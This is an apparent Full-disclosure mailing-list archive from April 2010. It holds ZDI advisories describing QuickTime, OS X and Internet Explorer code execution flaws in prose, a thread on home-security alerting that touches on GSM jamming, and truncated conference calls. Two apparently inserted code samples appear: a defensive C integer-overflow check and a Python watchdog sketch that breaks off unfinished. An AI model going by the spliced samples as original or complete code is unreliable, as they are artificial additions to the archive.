2009-11-06 - Vulnerability reported to vendor
2010-04-02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
[Full-disclosure] ZDI-10-044: Apple QuickTime FLI LinePacket Remote Code Execution Vulnerability
ZDI-10-044: Apple QuickTime FLI LinePacket Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-044
April 2, 2010

-- CVE ID:
CVE-2010-0520

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9628. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within QuickTimeAuthoring.qtx during the parsing of DELTA_FLI chunks stored within a malformed .fli file. The application trusts a user-supplied length for decompression which can be modified to copy more data than necessary, leading to a buffer overflow. Successful exploitation can lead to code execution under the context of the current user.

-- Vendor Response:
Apple states:

http://support.apple.com/kb/HT4104
http://support.apple.com/kb/HT4070

-- Disclosure Timeline:
2009-11-06 - Vulnerability reported to vendor
2010-04-02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Moritz Jodeit of n.runs AG
* Anonymous
[Full-disclosure] ZDI-10-043: Apple QuickTime FlashPix NumberOfTiles Remote Code Execution Vulnerability
ZDI-10-043: Apple QuickTime FlashPix NumberOfTiles Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-043
April 2, 2010

-- CVE ID:
CVE-2010-0519

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9569. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists during the parsing of a malformed SubImage Header Stream from a malicious FlashPix image. The application takes the NumberOfTiles field from this data structure, multiplies it by 16, and then uses it in an allocation. If this result is larger than 32 bits the value will wrap, leading to an under-allocated buffer. Later, when the application copies data into this buffer, a buffer overflow will occur leading to code execution within the context of the application.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:

http://support.apple.com/kb/HT4104

-- Disclosure Timeline:
2009-10-27 - Vulnerability reported to vendor
2010-04-02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
[Full-disclosure] ZDI-10-042: Apple QuickTime MediaVideo Compressor Name Remote Code Execution Vulnerability
ZDI-10-042: Apple QuickTime MediaVideo Compressor Name Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-042
April 2, 2010

-- CVE ID:
CVE-2010-0528

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8443. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists during the parsing of malformed MediaVideo data from a sample description atom (STSD). The application will read a length from the file, subtract 1 and then use it as a counter for a loop. Certain values may cause memory corruption and can result in code execution under the context of the current user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:

http://support.apple.com/kb/HT4104

-- Disclosure Timeline:
2009-08-20 - Vulnerability reported to vendor
2010-04-02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
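The two size-arithmetic defects described in the ZDI-10-043 and ZDI-10-042 advisories above (a NumberOfTiles count multiplied by 16 that wraps past 32 bits, and a file-supplied length with 1 subtracted that drives a loop) as an added C example that is not Apple's or ZDI's code: a hypothetical allocation-size helper in its unchecked and checked forms, with constructed input values, the 16-byte multiplier being the only figure taken from the advisory text.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Added example, not code from Apple QuickTime or the ZDI advisories.
 * TILE_ENTRY_SIZE is the per-tile multiplier the ZDI-10-043 text gives (16);
 * the function names and the sample values below are constructed. */
#define TILE_ENTRY_SIZE 16u

/* Unchecked form of the ZDI-10-043 pattern: a file-supplied tile count
 * multiplied by 16 in 32-bit unsigned arithmetic wraps silently, so a huge
 * count yields a tiny allocation that a later copy overruns. */
static uint32_t tiles_alloc_size_unchecked(uint32_t num_tiles)
{
    return num_tiles * TILE_ENTRY_SIZE;
}

/* Checked form: refuse any count whose product would not fit in 32 bits.
 * Returns false (and leaves *out untouched) instead of a wrapped size. */
static bool tiles_alloc_size_checked(uint32_t num_tiles, uint32_t *out)
{
    if (num_tiles > UINT32_MAX / TILE_ENTRY_SIZE)
        return false;
    *out = num_tiles * TILE_ENTRY_SIZE;
    return true;
}

/* Convenience wrapper: 0 means "rejected" (a zero-tile image needs no buffer). */
static uint32_t tiles_alloc_size_or_zero(uint32_t num_tiles)
{
    uint32_t size = 0;
    return tiles_alloc_size_checked(num_tiles, &size) ? size : 0;
}

/* ZDI-10-042 pattern: a file-supplied length has 1 subtracted and the result
 * drives a loop. With len == 0 the unsigned subtraction wraps to UINT32_MAX,
 * so the loop runs far past whatever the buffer actually holds. The checked
 * version bounds len against the space available before deriving the count.
 * Returns -1 when the length is rejected. */
static int64_t loop_count_or_neg(uint32_t len, uint32_t max_len)
{
    if (len == 0 || len > max_len)
        return -1;
    return (int64_t)len - 1;
}

/* Shows the wrap on a constructed count: 0x10000001 * 16 == 0x100000010,
 * which truncates to 0x10, a 16-byte buffer for 268 million tile entries. */
static bool demo_wrap_detected(void)
{
    const uint32_t n = 0x10000001u;
    uint32_t size = 0;
    bool accepted = tiles_alloc_size_checked(n, &size);
    return !accepted && tiles_alloc_size_unchecked(n) == 0x10u;
}

int main(void)
{
    printf("unchecked size for 0x10000001 tiles: %u bytes\n",
           tiles_alloc_size_unchecked(0x10000001u));
    printf("checked helper rejects it: %s\n", demo_wrap_detected() ? "yes" : "no");
    printf("loop count for len 0: %lld\n", (long long)loop_count_or_neg(0, 64));
    return 0;
}
```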
[Full-disclosure] ZDI-10-041: Apple QuickTime QDM2/QDCA Atom Remote Code Execution Vulnerability
ZDI-10-041: Apple QuickTime QDM2/QDCA Atom Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-041
April 2, 2010

-- CVE ID:
CVE-2010-0059

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9431. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists during the rendering of an audio stream utilizing QDesign's audio codec. The application will perform an allocation utilizing a field specified in the sample's description. Later, when initializing the buffer, the application will utilize a different length. If the lengths differ, then a buffer overflow will occur. This can lead to code execution under the context of the currently logged in user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:

http://support.apple.com/kb/HT4077

-- Disclosure Timeline:
2009-08-10 - Vulnerability reported to vendor
2010-04-02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
[Full-disclosure] ZDI-10-040: Apple QuickTime RLE Bit Depth Remote Code Execution Vulnerability
ZDI-10-040: Apple QuickTime RLE Bit Depth Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-040
April 2, 2010

-- CVE ID:
CVE-2010-0516

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8437. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists during the parsing of samples from a malformed .mov file utilizing the RLE codec. While decoding RLE data, the application will fail to validate the size when decompressing the data into a heap chunk. If the length is larger than the size of the chunk allocated, then a memory corruption will occur leading to code execution under the context of the currently logged in user.

-- Vendor Response:

-- Disclosure Timeline:
2009-08-10 - Vulnerability reported to vendor
2010-04-02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
[Full-disclosure] ZDI-10-039: Apple OS X Internet Enabled Disk Image Remote Code Execution Vulnerability
ZDI-10-039: Apple OS X Internet Enabled Disk Image Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-039
April 2, 2010

-- CVE ID:
CVE-2010-0497

-- Affected Vendors:
Apple

-- Affected Products:
Apple OS X

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8402. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple OS X. User interaction is required to exploit this vulnerability in that the target must open a malicious file.

The specific flaw exists in the handling of internet enabled disk image files. When a specially crafted Menu Extras plugin is included in the disk image, it is executed without further interaction, allowing for arbitrary code execution under the context of the current user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:

http://support.apple.com/kb/HT4077

-- Disclosure Timeline:
2009-08-10 - Vulnerability reported to vendor
2010-04-02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Brian Mastenbrook
[Full-disclosure] ZDI-10-038: Apple QuickTime QDMC/QDM2 Remote Code Execution Vulnerability
ZDI-10-038: Apple QuickTime QDMC/QDM2 Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-038
April 2, 2010

-- CVE ID:
CVE-2010-0060

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9642. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists in the QuickTimeAudioSupport.qtx library when parsing malformed QDMC and QDM2 codec atoms. By modifying specific values within the stream an attacker can cause heap corruption which can lead to arbitrary code execution under the context of the currently logged in user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:

http://support.apple.com/kb/HT4077

-- Disclosure Timeline:
2009-09-22 - Vulnerability reported to vendor
2010-04-02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
[Full-disclosure] ZDI-10-037: Apple QuickTime MJPEG Sample Dimensions Remote Code Execution Vulnerability
ZDI-10-037: Apple QuickTime MJPEG Sample Dimensions Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-037
April 2, 2010

-- CVE ID:
CVE-2010-0517

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8413. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists during the parsing of compressed mjpeg data from a malformed .mov file. The application will utilize the width and height fields in the file for calculating the size of a heap buffer. When copying into this buffer, the application will use a different field in the file to determine when to stop copying. If the first calculated length is smaller than the one used for decompression, a memory corruption will occur which can result in code execution under the context of the current user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:

http://support.apple.com/kb/HT4077

-- Disclosure Timeline:
2009-07-14 - Vulnerability reported to vendor
2010-04-02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Damian Put
* Anonymous
[Full-disclosure] ZDI-10-036: Apple QuickTime H.263 PictureHeader Remote Code Execution Vulnerability
ZDI-10-036: Apple QuickTime H.263 PictureHeader Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-036
April 2, 2010

-- CVE ID:
CVE-2010-0062

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8438. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within quicktime.qts when parsing sample data from a malformed .3g2 file that is utilizing the h.263 codec. While parsing data to render the video stream, the application will miscalculate the length of a buffer. Later, when decompressing data to the heap chunk, the application will overflow the under-allocated buffer, leading to code execution under the context of the currently logged in user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:

http://support.apple.com/kb/HT4077

-- Disclosure Timeline:
2009-08-10 - Vulnerability reported to vendor
2010-04-02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Damian Put
* Anonymous
[Full-disclosure] ZDI-10-035: Apple QuickTime genl Atom Remote Code Execution Vulnerability
ZDI-10-035: Apple QuickTime genl Atom Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-035
April 2, 2010

-- CVE ID:
CVE-2010-0526

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8045. For further product information on the TippingPoint IPS, visit:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must open a malicious file.

The specific flaw exists in QuickTimeMPEG.qtx and results when QuickTime attempts to parse a malformed 'genl' atom that may be present in any QuickTime media file. A heap overflow is caused when QuickTime fails to perform proper bounds checking on the amount of data copied to the heap by a set of nested loops, which can result in arbitrary code execution.

-- Vendor Response:

-- Disclosure Timeline:
2009-03-26 - Vulnerability reported to vendor
2010-04-02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
[Full-disclosure] ZDI-10-034: Microsoft Internet Explorer Tabular Data Control ActiveX Remote Code Execution Vulnerability
ZDI-10-034: Microsoft Internet Explorer Tabular Data Control ActiveX Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-034
April 2, 2010

-- CVE ID:
CVE-2010-0805

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Internet Explorer

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9634. For further product information on the TippingPoint IPS, visit:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer 6. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.

The specific flaw exists within the Tabular Data Control ActiveX module. Specifically, if provided a malicious DataURL parameter, a stack corruption may occur in the function CTDCCtl::SecurityCHeckDataURL. This can be leveraged to execute arbitrary code under the context of the current user.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details can be found at:
http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx

-- Disclosure Timeline:
2009-10-20 - Vulnerability reported to vendor
2010-04-02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
[Full-disclosure] ZDI-10-033: Microsoft Internet Explorer TIME2 Behavior Remote Code Execution Vulnerability
ZDI-10-033: Microsoft Internet Explorer TIME2 Behavior Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-033
April 2, 2010

-- CVE ID:
CVE-2010-0492

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Internet Explorer

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9632. For further product information on the TippingPoint IPS, visit:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious web page.

The issue is located within the CTimeAction object. During handling of the TIME2 behavior, an attacker can trick the application into destroying the markup, causing the application to reference memory that has previously been freed. Successful exploitation can lead to code execution under the context of the application.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details can be found at:
http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx

-- Disclosure Timeline:
2009-08-10 - Vulnerability reported to vendor
2010-04-02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Simon Zuckerbraun
Re: [Full-disclosure] Security system
Can't hurt. I don't trust machines in DCs much less VPSs.

An adversary with the resources and motivation to kill power, net, and jam GSM when they're pwning your house would probably be able to know about and take out your watchdog box in the same move.

-Travis

On Fri, Apr 2, 2010 at 9:46 AM, Haris Pilton wrote:
> On Tuesday, March 30, 2010, T Biehn wrote:
>> Nah, I'm saying a GSM jammer would block your prepaid cell signal.
>>
>> So if your adversary were to cut the power, cut the net AND jam GSM
>> you'd be out of luck in getting notification.
>
> Very true, though you can combine this with a remote box that reacts iff it
> can no longer reach your home box. That way they can't just block outgoing
> signals and be clear.
>
>> You can get all fancy and have your program try all methods available.
>> Cell, Wired Net, WIFI (throw an antenna on your roof,) pager, etc.
>>
>> -Travis
>>
>> On Tue, Mar 30, 2010 at 10:39 AM, wrote:
>>> Good idea, you're saying also I should buy a GSM jammer, this is a good idea, I will
>>> try.
>>>
>>> Sent from my iPhone
>>>
>>> On Mar 30, 2010, at 11:30 AM, T Biehn wrote:
>>>> Buy a prepaid cell, rig your comp & phone up to a battery backup.
>>>> Breakout board on your Serial port, or from a USB-DB9 RS232 adapter.
>>>>
>>>> Have the text message banged out on the prepaid, rig wires from the
>>>> breakout board to the cell phone, rig wires from your security sensors
>>>> into your breakout board. App to listen on com port, send a nice high
>>>> signal to the pin connecting to your send key.
>>>>
>>>> Done.
>>>>
>>>> Like, 50$ for the phone incl. minutes.
>>>> Like less than 20$ for a breakout board.
>>>>
>>>> Also, rig the ringer up to an input on the breakout board and you can
>>>> call your phone to clear your FDE keys from RAM and kill your machine
>>>> if you think the man is paying a visit once you get a text :)
>>>>
>>>> Some adversaries will cut net, hardline, sometimes power.
>>>>
>>>> Attacks: GSM jammers, which everyone has.
>>>>
>>>> -Travis
>>>>
>>>> On Sat, Mar 27, 2010 at 6:44 PM, Oscar Bacelar wrote:
>>>>> Try arduino + internet.
>>>>>
>>>>> 2010/3/27
>>>>>> Any one got any ideas how I would program a system to call me from a
>>>>>> voip network to alert me of a home security breach.
>>>>>>
>>>>>> Sent from my iPhone

--
FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
[Full-disclosure] 3rd CfP: INTERNET 2010 || September 20-25, 2010 - Valencia, Spain
INVITATION:

=
Please consider contributing to and/or forwarding to the appropriate groups the following opportunity to submit and publish original scientific results.
=

== INTERNET 2010 | Call for Papers ===

CALL FOR PAPERS, TUTORIALS, PANELS

INTERNET 2010: The Second International Conference on Evolving Internet
September 20-25, 2010 - Valencia, Spain

General page: http://www.iaria.org/conferences2010/INTERNET10.html
Call for Papers: http://www.iaria.org/conferences2010/CfPINTERNET10.html
Submission deadline: April 20, 2010

Sponsored by IARIA, www.iaria.org
Extended versions of selected papers will be published in IARIA Journals: http://www.iariajournals.org

Publisher: CPS ( see: http://www2.computer.org/portal/web/cscps )
Archived: IEEE CSDL (Computer Science Digital Library) and IEEE Xplore
Submitted for indexing: Elsevier's EI Compendex Database, EI's Engineering Information Index
Other indexes are being considered: INSPEC, DBLP, Thomson Reuters Conference Proceedings Citation Index

Please note the Poster Forum and Work in Progress options.

The topics suggested by the conference can be discussed in terms of concepts, state of the art, research, standards, implementations, running experiments, applications, and industrial case studies. Authors are invited to submit complete unpublished papers, which are not under review in any other conference or journal, in the following, but not limited to, topic areas.

All tracks are open to both research and industry contributions, in terms of Regular papers, Posters, Work in progress, Technical/marketing/business presentations, Demos, Tutorials, and Panels.

Before submission, please check and conform with the Editorial rules: http://www.iaria.org/editorialrules.html

INTERNET 2010 Tracks (tracks' topics and submission details: see CfP on the site)

Advanced Internet mechanisms
Access: call admission control vs. QoE vs. structural QoS / capability-based access control vs. role-based access control vs. attribute-based access control;
Routing and pricing models: BGP, pricing peering agreements using microeconomics, topological routing vs. table-based routing vs. network coding, power-efficient routing;
Optimization in P2P/CDN networks: peer placement for streaming P2P, analysis of P2P networks;
Traffic engineering: estimating traffic matrices, constrained routing, exponentially bounded burstness;
Behavioral traffic recognition: identifying applications from traffic behavior;
Traffic analysis: methods for analysis and visualization of multidimensional measurements, characterizing protocols;
Software defined radio networks: low power signal processing methods, applications of machine learning;
Cognitive radio: medium access, spatiotemporality, complexity, spectrum sharing and leasing, channel selection, multi-stage pricing, cyclostationary signatures, frame synchronization;
Streaming video: learning from video, techniques for in-network modulation;
Location: statistical location, partial measurements, delay estimation

Graph theory/topology/routing Internet support
Information theory: distributed network coding, Shannon's entropy, Nash equilibrium;
Optimization: LP, NLP, NeuroP, quadratic, convex programming, compressed sensing;
Graph theory: random graphs, spectra graph theory, percolations and phase transitions, methods from statistical physics, geometric random graphs;
Algebraic techniques: tensor analysis, matrix decomposition;
Processing: signal processing techniques, equalization, point-process, source coding vs. network coding, recoverability;
Statistical machine learning: probabilistic graphical models, classification, clustering, regression, neural networks, support vector machines, decision forests;
Game Theory/Microeconomic theory: social choice theory, equilibria, arbitrage and incentive oriented distributed mechanism design, cooperative games, and games on graphs;
Stochastic network calculus;
Fractal behavior and stability mechanisms;
Kolmogorov complexity for performance evaluation;
Complexity theory

Internet security mechanisms
Cryptography: design and analysis of cryptographic algorithms, applied cryptography, cryptographic protocols and functions;
Specification, validation design of security and dependability: security and trust models, semantics and computational models for security and trust, business models in security management, security policies models, security architectures, formal methods for verification and certification, multi-level security specification;
Vulnerabilities, attacks and risks: methods of detection, analysis, prevention, intrusion detection, tolerance, response and prevention, attacks and prevention of on-line fraud, denial of services attacks and prevention methods;
Access Control: authentication and non-repudiation, accounting and audit, anonymity and pseudonymity; identity and trust managem
[Full-disclosure] 3rd CfP: ACCESS 2010 || September 20-25, 2010 - Valencia, Spain
INVITATION:

=
Please consider contributing to and/or forwarding to the appropriate groups the following opportunity to submit and publish original scientific results.
=

== ACCESS 2010 | Call for Papers ===

CALL FOR PAPERS, TUTORIALS, PANELS

ACCESS 2010: The First International Conferences on Access Networks, Services and Technologies
September 20-25, 2010 - Valencia, Spain

General page: http://www.iaria.org/conferences2010/ACCESS10.html
Call for Papers: http://www.iaria.org/conferences2010/CfPACCESS10.html
Submission deadline: April 20, 2010

Sponsored by IARIA, www.iaria.org
Extended versions of selected papers will be published in IARIA Journals: http://www.iariajournals.org

Publisher: CPS ( see: http://www2.computer.org/portal/web/cscps )
Archived: IEEE CSDL (Computer Science Digital Library) and IEEE Xplore
Submitted for indexing: Elsevier's EI Compendex Database, EI's Engineering Information Index
Other indexes are being considered: INSPEC, DBLP, Thomson Reuters Conference Proceedings Citation Index

Please note the Poster Forum and Work in Progress options.

The topics suggested by the conference can be discussed in terms of concepts, state of the art, research, standards, implementations, running experiments, applications, and industrial case studies. Authors are invited to submit complete unpublished papers, which are not under review in any other conference or journal, in the following, but not limited to, topic areas.

All tracks are open to both research and industry contributions, in terms of Regular papers, Posters, Work in progress, Technical/marketing/business presentations, Demos, Tutorials, and Panels.

Before submission, please check and conform with the Editorial rules: http://www.iaria.org/editorialrules.html

ACCESS 2010 Tracks (tracks' topics and submission details: see CfP on the site)

NEXTACCESS: Next generation access technologies
Interactivity, unlimited access and full-scale media support;
Energy-aware and efficiency-oriented technologies;
Sustainable access network business (standard DSL vs. fiber vs. wireless access);
3G/4G wireless technologies;
Multiservice access (DSL, fiber, WiMAX, POTS);
FTTH;
Ethernet P2P vs. xPON;
FTTx with VDSL2, or Ethernet, or DOCSIS 3.0;
Radio extension, 802.xx (Wi-Fi, WiMax, etc.);
LTE, LTE-advanced;
IMT-advanced networks;
Mesh and relay networks (IEEE 802.11s, IEEE802.16j, etc.);
Quality of experience (QoE)

FEMTO: Femtocells-based access
Femtocells architectures;
Femtocells requirements and specifications;
Femtocells protocols;
Femtocells services and applications;
Traffic and QoS in Femtocells;
Performance analysis in Femtocells;
Femtocells control and management;
Interoperability of Femtocells devices;
Femtocells operation optimization;
Femtocells specific solutions for mobility;
OFDMA Femtocells: interference avoidance;
Macrocell-Femtocell interference issues and mitigation;
Macrocell-Femtocell handover strategies;
WiMAX Femtocells;
Standardization of Femtocells

BROADBAND: Broadband wireless Internet access
New architectures, technologies, protocols for broadband wireless access;
QoS in mobile and broadband wireless access networks;
Broadcast and multicast support;
Physical and data link layer issues;
Medium access control, SLA and QoS;
Radio resource management and call admission control;
Space-time coding for broadband wireless Internet;
Modulation, coding and antennas (MIMO);
Spectrum management;
Scalability and reliability issues;
Wireless mesh networks;
Capacity planning and traffic engineering;
Security and privacy issues;
Interoperability aspects (fixed/mobile LANs/MANs, WANs);
Experiences/lessons from recent deployments

OPTICAL: Optical access networks
Optical access network architecture design;
Optical access network components and systems;
New PON developments and testbeds;
WDM and OFDM PON technologies;
MAC and bandwidth allocation;
RoF network architecture and MAC;
RoF components and systems;
Signal processing for new modulation formats;
Optical spectral management;
Multimode fiber technology and applications;
Performance monitoring and diagnosis;
Deployment and economic analysis

MOBILE WIRELESS: Mobile wireless access
Mobile Broadband Wireless Access;
Wireless/Mobile Access Protocols;
Wireless/Mobile Web Access;
Ubiquitous and mobile access;
Mobile/vehicular environment access;
Multi-Homing and Vertical Handoff;
Localization and tracking;
Context-aware services and applications;
Context-aware protocols and protocol architectures;
Interactive applications;
Mobile and Wireless Entertainment;
Mobile Info-services;
Wireless ad hoc and sensor networks

DYNAMIC: Dynamic and cognitive access
Dynamic spectrum access;
Architectures and platforms for dynamic spectrum access networks;
Spectrum sensing, measurement and models;
Efficient and broadband spectrum sensing;
Interference metrics and measurements;
New spectrum protocols an
Re: [Full-disclosure] Security system
On Tuesday, March 30, 2010, T Biehn wrote:
> Nah, I'm saying a GSM jammer would block your prepaid cell signal.
>
> So if your adversary were to cut the power, cut the net AND jam GSM
> you'd be out of luck in getting notification.

Very true, though you can combine this with a remote box that reacts iff it
can no longer reach your home box. That way they can't just block outgoing
signals and be clear.

> You can get all fancy and have your program try all methods available.
> Cell, Wired Net, WIFI (throw an antenna on your roof,) pager, etc.
>
> -Travis
>
> On Tue, Mar 30, 2010 at 10:39 AM, wrote:
>> Good idea, you're saying also I should buy a GSM jammer, this is a good idea, I will
>> try.
>>
>> Sent from my iPhone
>>
>> On Mar 30, 2010, at 11:30 AM, T Biehn wrote:
>>
>>> Buy a prepaid cell, rig your comp & phone up to a battery backup.
>>> Breakout board on your Serial port, or from a USB-DB9 RS232 adapter.
>>>
>>> Have the text message banged out on the prepaid, rig wires from the
>>> breakout board to the cell phone, rig wires from your security sensors
>>> into your breakout board. App to listen on com port, send a nice high
>>> signal to the pin connecting to your send key.
>>>
>>> Done.
>>>
>>> Like, 50$ for the phone incl. minutes.
>>> Like less than 20$ for a breakout board.
>>>
>>> Also, rig the ringer up to an input on the breakout board and you can
>>> call your phone to clear your FDE keys from RAM and kill your machine
>>> if you think the man is paying a visit once you get a text :)
>>>
>>> Some adversaries will cut net, hardline, sometimes power.
>>>
>>> Attacks: GSM jammers, which everyone has.
>>>
>>> -Travis
>>>
>>> On Sat, Mar 27, 2010 at 6:44 PM, Oscar Bacelar wrote:
>>>> Try arduino + internet.
>>>>
>>>> 2010/3/27
>>>>> Any one got any ideas how I would program a system to call me from a
>>>>> voip network to alert me of a home security breach.
>>>>>
>>>>> Sent from my iPhone
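The remote watchdog box proposed in this thread (a box that reacts only when it can no longer reach the home box) together with Travis's point that a home box whose net is cut and GSM jammed simply goes silent, as an added Python sketch that is not code from the thread: the home box signs each heartbeat with a shared key, and the remote box alerts once every channel has been silent past a grace period while rejecting forged or replayed heartbeats. The shared secret, channel names and event timeline are constructed for the example.

```python
import hashlib
import hmac
import json

# Constructed shared secret for the example; each home/remote pair would get its own.
SECRET = b"constructed-shared-secret"


def make_heartbeat(channel, seq, ts, key=SECRET):
    """Home box side: build an authenticated heartbeat for one channel."""
    body = json.dumps({"ch": channel, "seq": seq, "ts": ts}, sort_keys=True).encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    return body + b"." + tag


def parse_heartbeat(msg, key=SECRET):
    """Remote box side: verify the HMAC tag; return the fields, or None if forged."""
    body, sep, tag = msg.rpartition(b".")
    if not sep:
        return None
    expected = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(tag, expected):
        return None
    return json.loads(body)


class Watchdog:
    """Remote box: alert when every channel has been silent longer than `grace` seconds.

    Losing one channel (cut wire, jammed GSM) only degrades; losing all of them
    is the signal the thread wants to act on.
    """

    def __init__(self, channels, grace):
        self.channels = tuple(channels)
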